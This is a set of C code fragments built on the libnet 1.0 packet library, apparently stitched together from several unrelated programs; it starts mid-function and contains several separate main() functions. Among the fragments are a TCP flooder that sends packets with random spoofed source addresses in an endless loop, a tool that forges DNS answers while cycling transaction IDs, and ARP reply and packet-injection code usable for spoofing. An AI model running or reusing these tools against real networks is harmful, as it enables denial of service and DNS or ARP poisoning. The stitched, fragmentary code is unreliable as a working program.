ETHERTYPE_ARP,// ethernet packet type NULL, // pointer to payload 0, // payload size packet // pointer to packet buffer ); printf("Sending ARP reply packet %s --> %s\n",SOURCE,DEST); libnet_build_arp(ARPHRD_ETHER, // hardware type ETHERTYPE_IP, // protocol type ETHER_ADDR_LEN, // hardware address size 4, // protocol address size ARPOP_REPLY, // ARP operation smac, // source mac (u_char *)&src_ip, // source ip dmac, // destination mac (u_char *)&dst_ip, // destination ip NULL, // pointer to payload 0, // payload size packet+LIBNET_ETH_H // pointer to packet buffer ); // Get the packet on the wire send = libnet_write_link_layer(link,device,packet,LIBNET_ETH_H+LIBNET_IP_H+LIBNET_TCP_H+p_size); // was the complete packet send over the wire? if(send < LIBNET_IP_H+LIBNET_TCP_H+p_size) { printf("error while writing packet into the socket...\n"); } // close the network device libnet_close_link_interface(link); } else { // Open a raw sock sock = libnet_open_raw_sock(IPPROTO_RAW); // Allocate memory for the packet if(libnet_init_packet(LIBNET_IP_H+LIBNET_TCP_H+p_size,&packet) == -1) { printf("libnet_init_packet error!\n%s\n", strerror(errno)); exit(1); } // Build ip header libnet_build_ip(LIBNET_TCP_H+p_size,// packet length without ip header length 0, // ip type of service 242, // ip id 0, // fragmentation bit 48, // time to live IPPROTO_TCP, // Transport Control Protokoll src_ip, // source ip dst_ip, // destination ip NULL, // pointer to ip payload 0, // ip options packet // pointer to packet buffer ); // Build UDP packet? if(!strcmp(type,"udp")) { libnet_build_udp(ntohs(SPORT), // Source port ntohs(DPORT), // destination port payload, // pointer to packet payload p_size, // payload size packet+LIBNET_IP_H // pointer to packet buffer ); printf("Sending UDP packet %s:%d --> %s.%d\n",SOURCE,SPORT,DEST,DPORT); } // Build TCP/IP packet per default else { // Build tcp header libnet_build_tcp(ntohs(SPORT), // source port ntohs(DPORT), // destination port 1000000000, // acknowledge number 1000000000, // sequence number TH_ACK, // tcp flags 1024, // window size 0, // urgent pointer payload, // pointer to packet payload p_size, // payload size packet+LIBNET_IP_H // pointer to the packet buffer ); printf("Sending TCP packet %s:%d --> %s.%d\n",SOURCE,SPORT,DEST,DPORT); } // Calculize checksum libnet_do_checksum(packet,IPPROTO_TCP,LIBNET_IP_H+LIBNET_TCP_H+p_size); // Get the packet on the wire send = libnet_write_ip(sock,packet,LIBNET_IP_H+LIBNET_TCP_H+p_size); // was the complete packet send over the wire? if(send < LIBNET_IP_H+LIBNET_TCP_H+p_size) { printf("error while writing packet into the socket...\n"); } // close the socket libnet_close_raw_sock(sock); } // free the memory //libnet_destroy_packet(packet); free(payload); free(errbuff); return 1; }
void send_packet(char *protocol, int sport2, int dport2, int id, int ttl, int count, const u_char *payload, int payload_size) { char errbuf[LIBNET_ERRBUF_SIZE]; /* error buffer */ struct libnet_link_int *network; /* pointer to link interface struct */ int packet_size; /* size of our packet */ int ip_size; /* size of our ip */ int udp_size; /* size of our udp */ int tcp_size; /* size of our tcp */ int c; u_char *packet; /* pointer to our packet buffer */ /* * Step 1: Network Initialization (interchangable with step 2). */ if ((network = libnet_open_link_interface(dev2, errbuf)) == NULL) { libnet_error(LIBNET_ERR_FATAL, "libnet_open_link_interface: %s\n", errbuf); } /* * We're going to build a UDP packet with a payload using the * link-layer API, so this time we need memory for a ethernet header * as well as memory for the ICMP and IP headers and our payload. */ if (protocol == "udp") { packet_size = LIBNET_ETH_H + LIBNET_IP_H + LIBNET_UDP_H + payload_size; ip_size = LIBNET_IP_H + LIBNET_UDP_H + payload_size; udp_size = LIBNET_UDP_H + payload_size; /* * Step 2: Memory Initialization (interchangable with step 1). */ if (libnet_init_packet(packet_size, &packet) == -1) { libnet_error(LIBNET_ERR_FATAL, "libnet_init_packet failed\n"); } /* * Step 3: Packet construction (ethernet header). */ libnet_build_ethernet( enet_dst, enet_src, ETHERTYPE_IP, NULL, 0, packet); printf("\n--- Injected packet number %i on %s ---\n", count, dev2); /* * Step 3: Packet construction (IP header). */ libnet_build_ip( LIBNET_UDP_H + payload_size, 0, /* IP tos */ id, /* IP ID */ 0, /* Frag */ ttl, /* TTL */ IPPROTO_UDP, /* Transport protocol */ inet_addr(saddr2), /* Source IP */ inet_addr(daddr2), /* Destination IP */ payload, /* Pointer to payload (none) */ 0, packet + LIBNET_ETH_H); /* Packet header memory */ /* * Step 3: Packet construction (UDP header). */ libnet_build_udp( sport2, /* source port */ dport2, /* dest. port */ payload, /* payload */ payload_size, /* payload length */ packet + LIBNET_ETH_H + LIBNET_IP_H); /* * Step 4: Packet checksums (ICMP header *AND* IP header). */ if (libnet_do_checksum(packet + ETH_H, IPPROTO_UDP, LIBNET_UDP_H + payload_size) == -1) { libnet_error(LIBNET_ERR_FATAL, "libnet_do_checksum failed\n"); } if (libnet_do_checksum(packet + ETH_H, IPPROTO_IP, LIBNET_IP_H) == -1) { libnet_error(LIBNET_ERR_FATAL, "libnet_do_checksum failed\n"); } /* print packet info */ if (!hide_header) { printf("IP header Src Addr: %s", saddr2); printf(" Dst Addr: %s\n", daddr2); printf(" Len: %i ID: %i TTL: %i\n", ip_size, id, ttl); printf("UDP header Src port: %i Dst port: %i Len: %i\n", sport2, dport2, udp_size); } if (!hide_payload) { printf("Payload (%d bytes)\n", payload_size); print_payload(payload, payload_size); } } if (protocol == "tcp") { packet_size = LIBNET_ETH_H + LIBNET_IP_H + LIBNET_TCP_H + payload_size; ip_size = LIBNET_IP_H + LIBNET_TCP_H + payload_size; tcp_size = LIBNET_TCP_H + payload_size; /* * Step 2: Memory Initialization (interchangable with step 1). */ if (libnet_init_packet(packet_size, &packet) == -1) { libnet_error(LIBNET_ERR_FATAL, "libnet_init_packet failed\n"); } /* * Step 3: Packet construction (ethernet header). */ libnet_build_ethernet( enet_dst, enet_src, ETHERTYPE_IP, NULL, 0, packet); printf("\n--- Injected packet number %i on %s ---\n", count, dev2); /* * Step 3: Packet construction (IP header). */ libnet_build_ip( LIBNET_TCP_H + payload_size, 0, /* IP tos */ id, /* IP ID */ 0, /* Frag */ ttl, /* TTL */ IPPROTO_TCP, /* Transport protocol */ inet_addr(saddr2), /* Source IP */ inet_addr(daddr2), /* Destination IP */ payload, /* Pointer to payload */ 0, packet + LIBNET_ETH_H); /* Packet header memory */ /* * Step 3: Packet construction (TCP header). */ libnet_build_tcp( sport2, /* source TCP port */ dport2, /* destination TCP port */ 0xa1d95, /* sequence number */ 0x53, /* acknowledgement number */ TH_SYN, /* control flags */ 1024, /* window size */ 0, /* urgent pointer */ NULL, /* payload (none) */ 0, /* payload length */ packet + LIBNET_ETH_H + LIBNET_IP_H); /* * Step 4: Packet checksums (ICMP header *AND* IP header). */ if (libnet_do_checksum(packet + ETH_H, IPPROTO_TCP, LIBNET_TCP_H + payload_size) == -1) { libnet_error(LIBNET_ERR_FATAL, "libnet_do_checksum failed\n"); } if (libnet_do_checksum(packet + ETH_H, IPPROTO_IP, LIBNET_IP_H) == -1) { libnet_error(LIBNET_ERR_FATAL, "libnet_do_checksum failed\n"); } /* print packet info */ if (!hide_header) { printf("IP header Src Addr: %s", saddr2); printf(" Dst Addr: %s\n", daddr2); printf(" Len: %i ID: %i TTL: %i\n", ip_size, id, ttl); printf("TCP header Src port: %i Dst port: %i Len: %i\n", sport2, dport2, tcp_size); } if (!hide_payload) { printf("Payload (%d bytes)\n", payload_size); print_payload(payload, payload_size); } } /* * Step 5: Packet injection. */ c = libnet_write_link_layer(network, dev2, packet, packet_size); if (c < packet_size) { libnet_error(LN_ERR_WARNING, "libnet_write_link_layer only wrote %d bytes\n", c); } /* * Shut down the interface. */ if (libnet_close_link_interface(network) == -1) { libnet_error(LN_ERR_WARNING, "libnet_close_link_interface couldn't close the interface"); } /* * Free packet memory. */ libnet_destroy_packet(&packet); printf("\n"); }
int libnet_do_arp(struct libnet_link_int *l, u_char *device, struct ether_addr *e, u_long ip) { int n, i; u_char *buf, errbuf[256], *packet, *ip_p; struct libnet_ethernet_hdr *p; struct libnet_arp_hdr *a; u_long local_ip; pcap_t *pd; struct pcap_pkthdr pc_hdr; /* * Initialize a packet. */ if (libnet_init_packet(LIBNET_ARP_H + LIBNET_ETH_H, &buf) == -1) { perror("libnet_init_packet memory:"); exit(EXIT_FAILURE); } /* * Get the ethernet address of the device. */ e = libnet_get_hwaddr(l, device, errbuf); if (e == NULL) { fprintf(stderr, "libnet_get_hwaddr: %s\n", errbuf); return (-1); } /* * Get the IP address of the device. */ local_ip = htonl(libnet_get_ipaddr(l, device, errbuf)); if (!local_ip) { fprintf(stderr, "libnet_get_ipaddr: %s\n", errbuf); return (-1); } /* * Open the pcap device. */ pd = pcap_open_live(device, LIBNET_ARP_H + LIBNET_ETH_H, 1, 500, errbuf); if (pd == NULL) { fprintf(stderr, "pcap_open_live: %s\n", errbuf); return (-1); } /* * Ethernet header */ libnet_build_ethernet( enet_dst, /* broadcast ethernet address */ e->ether_addr_octet, /* source ethernet address */ ETHERTYPE_ARP, /* this frame holds an ARP packet */ NULL, /* payload */ 0, /* payload size */ buf); /* packet header memory */ /* * ARP header */ libnet_build_arp( ARPHRD_ETHER, /* hardware address type */ ETHERTYPE_IP, /* protocol address type */ ETHER_ADDR_LEN, /* hardware address length */ 4, /* protocol address length */ ARPOP_REQUEST, /* packet type - ARP request */ e->ether_addr_octet, /* source (local) ethernet address */ (u_char *)&local_ip, /* source (local) IP address */ enet_dst, /* target's ethernet address (broadcast) */ (u_char *)&ip, /* target's IP address */ NULL, /* payload */ 0, /* payload size */ buf + LIBNET_ETH_H); /* packet header memory */ n = libnet_write_link_layer(l, device, buf, LIBNET_ARP_H + LIBNET_ETH_H); if (n == -1) { fprintf(stderr, "libnet_write_link_layer choked\n"); return (-1); } printf("Sent a %d byte ARP request looking for the MAC of %s.\n", n, libnet_host_lookup(ip, 0)); printf("Waiting for a response...\n"); for (;(packet = ((u_char *)pcap_next(pd, &pc_hdr)));) { p = (struct libnet_ethernet_hdr *)(packet); if (ntohs(p->ether_type) == ETHERTYPE_ARP) { a = (struct libnet_arp_hdr *)(packet + LIBNET_ETH_H); if (ntohs(a->ar_op) == ARPOP_REPLY) { ip_p = (u_char *)&ip; if (IP_UCHAR_COMP(a->ar_spa, ip_p)) { printf("Target hardware address: "); for (i = 0; i < 6; i++) { printf("%x", a->ar_sha[i]); if (i != 5) { printf(":"); } } printf("\n"); } } } } libnet_destroy_packet(&buf); return (n); }
int buildether(ETHERhdr *eth, FileData *pd, char *device) { int n; u_int32_t eth_packetlen; static u_int8_t *pkt; char *ethertype; struct libnet_link_int *l2 = NULL; /* sanity checks */ if (pd->file_mem == NULL) pd->file_s = 0; eth_packetlen = LIBNET_ETH_H + pd->file_s; if ((l2 = libnet_open_link_interface(device, errbuf)) == NULL) { nemesis_device_failure(INJECTION_LINK, (const char *)device); return -1; } if (libnet_init_packet(eth_packetlen, &pkt) == -1) { fprintf(stderr, "ERROR: Unable to allocate packet memory.\n"); exit(1); } libnet_build_ethernet(eth->ether_dhost, eth->ether_shost, eth->ether_type, pd->file_mem, pd->file_s, pkt); n = libnet_write_link_layer(l2, device, pkt, eth_packetlen); #ifdef DEBUG printf("DEBUG: eth_packetlen is %u.\n", eth_packetlen); #endif if (verbose == 2) nemesis_hexdump(pkt, eth_packetlen, HEX_ASCII_DECODE); if (verbose == 3) nemesis_hexdump(pkt, eth_packetlen, HEX_RAW_DECODE); switch(eth->ether_type) { case ETHERTYPE_PUP: ethertype = "PUP"; break; case ETHERTYPE_IP: ethertype = "IP"; break; case ETHERTYPE_ARP: ethertype = "ARP"; break; case ETHERTYPE_REVARP: ethertype = "REVARP"; break; case ETHERTYPE_8021Q: ethertype = "802.1q"; break; case ETHERTYPE_IPV6: ethertype = "IPV6"; break; case ETHERTYPE_PPPOEDISC: ethertype = "PPOEDISC"; break; case ETHERTYPE_PPPOE: ethertype = "PPOE"; break; default: ethertype = NULL; break; } if (verbose) { if (ethertype != NULL) printf("Wrote %d byte Ethernet type %s packet through linktype " "%s.\n", n, ethertype, nemesis_lookup_linktype(l2->linktype)); else printf("Wrote %d byte Ethernet type %hu packet through linktype " "%s.\n", n, eth->ether_type, nemesis_lookup_linktype(l2->linktype)); } libnet_destroy_packet(&pkt); if (l2 != NULL) libnet_close_link_interface(l2); return (n); }
int main(int argc, char *argv[]) { int r; int i; int c; char ebuf[LIBNET_ERRBUF_SIZE]; struct ether_addr broadcast_ea; struct ether_addr *sea; struct ether_addr tea; struct in_addr sip, tip; uint8_t *arp_probe_packet; int sock_fd; struct ifreq ifr; char *if_name = "eth0"; struct libnet_link_int *lin; uint32_t tmp[6]; broadcast_ea.ether_addr_octet[0] = 0xFF; broadcast_ea.ether_addr_octet[1] = 0xFF; broadcast_ea.ether_addr_octet[2] = 0xFF; broadcast_ea.ether_addr_octet[3] = 0xFF; broadcast_ea.ether_addr_octet[4] = 0xFF; broadcast_ea.ether_addr_octet[5] = 0xFF; while ((c = getopt(argc, argv, "hi:")) != EOF) { switch (c) { case 'h': usage(0); case 'i': if_name = optarg; break; default: print("unknown argument: %s\n", optarg); usage(1); } } // initialize libnet link-level access to the network interface lin = libnet_open_link_interface(if_name, ebuf); if (!lin) die("libnet_open_link_interface(\"%s\"): %s\n", if_name, ebuf); // get the Ethernet address of this interface sea = libnet_get_hwaddr(lin, if_name, ebuf); if (!sea) die("libnet_get_hwaddr(\"%s\"): %s\n", if_name, ebuf); // get the IP address of this interface sock_fd = socket(PF_INET, SOCK_DGRAM, IPPROTO_IP); if (sock_fd < 0) die("cannot create socket: %s\n", strerror(errno)); strncpy(ifr.ifr_name, if_name, IFNAMSIZ - 1); ifr.ifr_name[IFNAMSIZ - 1] = (char)NULL; ifr.ifr_addr.sa_family = AF_INET; r = ioctl(sock_fd, SIOCGIFADDR, &ifr); if (r < 0) die("SIOCSIFADDR error: %s\n", strerror(errno)); sip = ((struct sockaddr_in *)&ifr.ifr_addr)->sin_addr; close(sock_fd); for (i = optind; i < argc; i ++) { if (strncmp(argv[i], "sip=", 4) == 0) { r = inet_aton(&argv[i][4], &sip); if (r == 0) die("invalid sip\n"); } else if (strncmp(argv[i], "sea=", 4) == 0) { r = sscanf( argv[i], "sea=%X:%X:%X:%X:%X:%X", &tmp[0], &tmp[1], &tmp[2], &tmp[3], &tmp[4], &tmp[5] ); sea->ether_addr_octet[0] = tmp[0]; sea->ether_addr_octet[1] = tmp[1]; sea->ether_addr_octet[2] = tmp[2]; sea->ether_addr_octet[3] = tmp[3]; sea->ether_addr_octet[4] = tmp[4]; sea->ether_addr_octet[5] = tmp[5]; if (r != 6) die("invalid sea\n"); } else if (strncmp(argv[i], "tip=", 4) == 0) { r = inet_aton(&argv[i][4], &tip); if (r == 0) die("invalid tip\n"); } else if (strncmp(argv[i], "tea=", 4) == 0) { r = sscanf( argv[i], "tea=%X:%X:%X:%X:%X:%X", &tmp[0], &tmp[1], &tmp[2], &tmp[3], &tmp[4], &tmp[5] ); tea.ether_addr_octet[0] = tmp[0]; tea.ether_addr_octet[1] = tmp[1]; tea.ether_addr_octet[2] = tmp[2]; tea.ether_addr_octet[3] = tmp[3]; tea.ether_addr_octet[4] = tmp[4]; tea.ether_addr_octet[5] = tmp[5]; if (r != 6) die("invalid tea\n"); } else { die("unknown arg: %s\n", argv[i]); } } print("interface %s\n", if_name); print(" sip: %s\n", inet_ntoa(sip)); print(" sea: %02X:%02X:%02X:%02X:%02X:%02X\n", sea->ether_addr_octet[0], sea->ether_addr_octet[1], sea->ether_addr_octet[2], sea->ether_addr_octet[3], sea->ether_addr_octet[4], sea->ether_addr_octet[5] ); print(" tip: %s\n", inet_ntoa(tip)); print(" tea: %02X:%02X:%02X:%02X:%02X:%02X\n", tea.ether_addr_octet[0], tea.ether_addr_octet[1], tea.ether_addr_octet[2], tea.ether_addr_octet[3], tea.ether_addr_octet[4], tea.ether_addr_octet[5] ); // allocate memory for the ARP probe packet r = libnet_init_packet(LIBNET_ETH_H + LIBNET_ARP_H, &arp_probe_packet); if (r == -1) die("libnet_init_packet(): error\n"); // build the Ethernet header of the ARP probe packet r = libnet_build_ethernet( broadcast_ea.ether_addr_octet, sea->ether_addr_octet, ETHERTYPE_ARP, NULL, 0, // payload pointer and size arp_probe_packet ); if (r == -1) die("libnet_build_ethernet(): error\n"); // build the ARP header r = libnet_build_arp( ARPHRD_ETHER, ETHERTYPE_IP, ETH_ALEN, 4, ARPOP_REQUEST, sea->ether_addr_octet, (uint8_t *)&sip.s_addr, tea.ether_addr_octet, (uint8_t *)&tip.s_addr, NULL, 0, // payload pointer and size arp_probe_packet + LIBNET_ETH_H ); if (r == -1) die("libnet_build_arp(): error\n"); r = libnet_write_link_layer( lin, if_name, arp_probe_packet, LIBNET_ARP_H + LIBNET_ETH_H ); if (r == -1) die("libnet_write_link_layer(): error\n"); return 0; }
int main (int argc, char *argv[]) { int i, loop; /* no payload yet */ int size = LIBNET_PACKET; opt.seqn = opt.ackn = opt.flags = 0; opt.dport = opt.sport = opt.frag = 0; opt.ttl = 255; opt.winsize = 16384; opt.tos = 0x08; signal (SIGINT, (void (*)()) abort); srand (time (NULL) + getpid ()); srandom (time (NULL) + getpid ()); banner (); parse_args (argc, argv); if (!whocares) { if (!local) { if (!(opt.dst = libnet_name_resolve (dsthost, LIBNET_RESOLVE))) { libnet_error (LIBNET_ERR_FATAL, ":: invalid destination IP address: %s\n", dsthost); exit (1); } printf (":: destination host - %s\n", dsthost); } else printf (":: destination host - local\n"); } else printf (":: destination host - whocares\n"); printf (":: destination port(s)"); for (i = 1; i < ports + 1; i++) printf (" - %d", portarray[i]); printf ("\n"); if (libnet_init_packet (size, &packet) == NULL) { libnet_error (LIBNET_ERR_FATAL, ":: libnet_init_packet failed\n"); } if ((s = libnet_open_raw_sock (IPPROTO_RAW)) == -1) { libnet_error (LIBNET_ERR_FATAL, ":: cannot open socket.\n"); } printf (":: spanking...\n"); printf (":: press ^C to end...\n"); for (;;) { for (i = 1; i < ports + 1; i++) { if (whocares) change2 = random () & 01; if (ismult) { opt.src = ((224 + rand () % 239) << 24) + ((rand () % 254) << 16) + ((rand () % 254) << 8) + (rand () % 254); if (local) opt.dst = ((224 + rand () % 239) << 24) + (0 << 16) + (0 << 8) + (rand () % 5); else { if (change2) opt.dst = ((224 + rand () % 239) << 24) + ((rand () % 254) << 16) + ((rand () % 254) << 8) + (rand () % 254); else opt.dst = rand (); } } else { opt.src = rand (); if (local) opt.dst = ((224 + rand () % 239) << 24) + (0 << 16) + (0 << 8) + (rand () % 5); else { if (change2) opt.dst = ((224 + rand () % 239) << 24) + ((rand () % 254) << 16) + ((rand () % 254) << 8) + (rand () % 254); else opt.dst = rand (); } } if (isrand) { loop = rand () % 5; for (i = 0; i <= loop; i++) opt.flags |= flag_array[rand () % 5]; opt.frag = frag_array[rand () % 3]; opt.ackn = random (); opt.sport = 1024 + rand () % 32000; opt.tos = tos_array[rand () % 3]; opt.ttl = rand () % 255; opt.winsize = rand () % 32000; if (change) ismult = random () & 01; } opt.ident = random (); opt.seqn = random (); if (!stream) opt.ackn = random (); if (portarray[i] == 0) opt.dport = rand () % 1024; else opt.dport = portarray[i]; libnet_build_ip (TCP_H, opt.tos, opt.ident, opt.frag, opt.ttl, IPPROTO_TCP, opt.src, opt.dst, NULL, 0, packet); libnet_build_tcp (opt.sport, opt.dport, opt.seqn, opt.ackn, opt.flags, opt.winsize, 0, NULL, 0, packet + IP_H); if (libnet_do_checksum (packet, IPPROTO_TCP, TCP_H) == -1) { libnet_error (LIBNET_ERR_FATAL, ":: libnet_do_checksum failed\n"); } libnet_write_ip (s, packet, size); } } return 1; }
int main (int argc, char **argv) { u_long src_ip, /* source address */ dst_ip; /* destination address */ u_short src_port, /* source port */ dst_port, /* destination port */ id; /* dns id we are spoofing */ int i, /* loop counter */ written_bytes, /* number of bytes written */ packet_size, /* size of our packet */ payload_size, /* size of our payload */ npackets, /* num of packet to write */ socket; /* socket to write on */ u_char *packet, /* we build this */ *payload; /* we send this */ if (argc < 7) { printf("\nusage: answer_dns <source_ip> <port> <destination_ip> <port> <dns_id> <#_packets>\n"); exit (EXIT_FAILURE); } if ((socket = libnet_open_raw_sock(IPPROTO_RAW)) == -1) libnet_error(LIBNET_ERR_FATAL, "network initialization failed\n"); src_ip = libnet_name_resolve(argv[1], 0); dst_ip = libnet_name_resolve(argv[3], 0); src_port = (u_short) atoi(argv[2]); dst_port = (u_short) atoi(argv[4]); id = (u_short) atoi(argv[5]); npackets = (int) atoi(argv[6]); payload = /* question section name/types, size: 21 */ "\x03\x77\x77\x77\x07\x72\x65\x64\x68\x69\x76\x65\x03\x63\x6f\x6d\x00\x00\x01\x00\x01" /* answer section, names/types, size: 21 */ "\x03\x77\x77\x77\x07\x72\x65\x64\x68\x69\x76\x65\x03\x63\x6f\x6d\x00\x00\x01\x00\x01" /* answer section, ttl, size: 4 */ "\xff\xff\xff\xff" /* answer section, rdata length, size: 2 */ "\x00\x04" /* answer section, rdata, size: 4 */ "\x81\x51\xe0\x43"; payload_size = 52; /* * packet memory allocation */ packet_size = payload_size + LIBNET_IP_H + LIBNET_UDP_H + LIBNET_DNS_H; libnet_init_packet(packet_size, &packet); if (packet == NULL) libnet_error(LIBNET_ERR_FATAL, "libnet_init_packet failed\n"); /* * ip header construction */ libnet_build_ip(payload_size + LIBNET_UDP_H + LIBNET_DNS_H, 0, /* ip tos */ 10951, /* ip id */ 0, /* fragmentation bits */ 64, /* ttl */ IPPROTO_UDP, /* protocol */ src_ip, /* source address */ dst_ip, /* destination address */ NULL, /* payload */ 0, /* payload length */ packet); /* packet buffer */ /* * udp header construction * during debugging i found that we weren't generating the correct * length here, that is why a payload length is included (payload + dns_header) * it really shouldn't be here though */ libnet_build_udp(src_port, /* source port */ dst_port, /* destination port */ NULL, /* payload */ payload_size + 12, /* payload length */ packet + LIBNET_IP_H); /* * write npackets * we loop from here because we must change the dns id and also re-checksum */ printf("\nwriting packets"); for (i = 0; i < npackets; i++) { printf("."); /* * dns header construction */ libnet_build_dns(id+i, /* dns id */ 0x8180, /* control flags */ 1, /* number of questions */ 1, /* number of answer RR's */ 0, /* number of authority RR's */ 0, /* number of additional RR's */ payload, /* payload */ payload_size, /* payload length */ packet + LIBNET_IP_H + LIBNET_UDP_H); /* * calculate checksum */ libnet_do_checksum (packet, IPPROTO_UDP, packet_size - LIBNET_IP_H); /* * write packet */ written_bytes = libnet_write_ip(socket, packet, packet_size); /* * make sure the number of written bytes jives with what we expect */ if (written_bytes < packet_size) libnet_error(LN_ERR_WARNING, "libnet_write_ip only wrote %d of %d bytes\n", written_bytes, packet_size); } /* * cleanup */ libnet_destroy_packet(&packet); if (libnet_close_raw_sock(socket) == -1) libnet_error(LN_ERR_WARNING, "libnet_close_raw_sock couldn't close the interface"); printf("\n"); return (written_bytes == -1 ? EXIT_FAILURE : EXIT_SUCCESS); }